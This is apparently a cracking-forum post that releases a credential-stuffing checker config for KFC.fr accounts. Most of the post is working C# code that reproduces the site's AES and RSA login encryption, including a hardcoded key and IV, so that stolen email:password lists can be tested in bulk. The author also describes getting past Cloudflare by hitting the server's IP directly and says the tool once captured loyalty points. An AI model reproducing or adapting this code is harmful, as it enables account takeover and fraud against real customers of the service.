Hello,
Since KFC.fr added 2FA I'm releasing the new updated config I've been using while few people had one for the past 3 months.
It was capturing points originally but since KFC added 2FA it's now just checking if the account is valid.
The config is using C# code in order to encrypt all required data being sent to KFC's authentication with AES encryption.
I would encourage you to read the full code to comprehend how it works.
It also has a shitty "cloudflare bypass" because these dumbasses allows you to directly send requests to their servers's IP address.
This is the C# code used :
Code:
const string PublicKey = "-----BEGIN PUBLIC KEY-----\n MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHO4AqKut5xbco9jgfz+bqkx9v0M\nO9t5DGzZEltqqZE5tNzHbve2D+KPWTeD+G9q2PilkPPHRz2+r5MgwlD4dGP6zum3\nhNj27CCIgUeaIJGhX/JlmBO3bgFGCcuemuKc+ygFJYvf0RzCo5svfn/6cKSHeovl\norMqQbQU3GrHLVA9AgMBAAE=\n -----END PUBLIC KEY-----";
const string IV = "@qwertyuiop12344";
public string GenerateRandomKey(int length)
{
const string chars = "@abcdefghijklmnopqrstuvwxyz123456789";
var random = new Random();
var result = new string(Enumerable.Repeat(chars, length)
.Select(s => s[random.Next(s.Length)]).ToArray());
return result;
}
public string Encrypt(string plainText, string key)
{
using (Aes aesAlg = Aes.Create())
{
aesAlg.Key = Encoding.UTF8.GetBytes(key);
aesAlg.IV = Encoding.UTF8.GetBytes(IV);
ICryptoTransform encryptor = aesAlg.CreateEncryptor(aesAlg.Key, aesAlg.IV);
using (MemoryStream msEncrypt = new MemoryStream())
{
using (CryptoStream csEncrypt = new CryptoStream(msEncrypt, encryptor, CryptoStreamMode.Write))
{
using (StreamWriter swEncrypt = new StreamWriter(csEncrypt))
{
swEncrypt.Write(plainText);
}
return Convert.ToBase64String(msEncrypt.ToArray());
}
}
}
}
public string EncryptWithPublicKey(string data)
{
using (RSACryptoServiceProvider rsa = new RSACryptoServiceProvider())
{
rsa.ImportFromPem(PublicKey);
byte[] dataBytes = Encoding.UTF8.GetBytes(data);
byte[] encryptedBytes = rsa.Encrypt(dataBytes, false);
return Convert.ToBase64String(encryptedBytes);
}
}
public string Login(string email, string password)
{
var aesKey = GenerateRandomKey(16);
var rsaEncryptedKey = EncryptWithPublicKey(aesKey);
var encryptedEmail = Encrypt(email, aesKey);
var encryptedPassword = Encrypt(password, aesKey);
var data = "{\"email\":\"" + encryptedEmail + "\",\"password\":\"" + encryptedPassword + "\"}";
var encryptedData = Encrypt(data, aesKey);
return "{\"data\":\"" + encryptedData + "\",\"key\":\"" + rsaEncryptedKey + "\"}";
}
var s = data.Line.Data.Split(':');
if (s.Length != 2) {
data.STATUS = "INVALID";
return;
}
var login = s[0];
var pass = s[1];
var loginPayload = Login(login, pass);
This is a quick preview :
![[Image: Fw4HrBv.png]](https://i.imgur.com/Fw4HrBv.png)
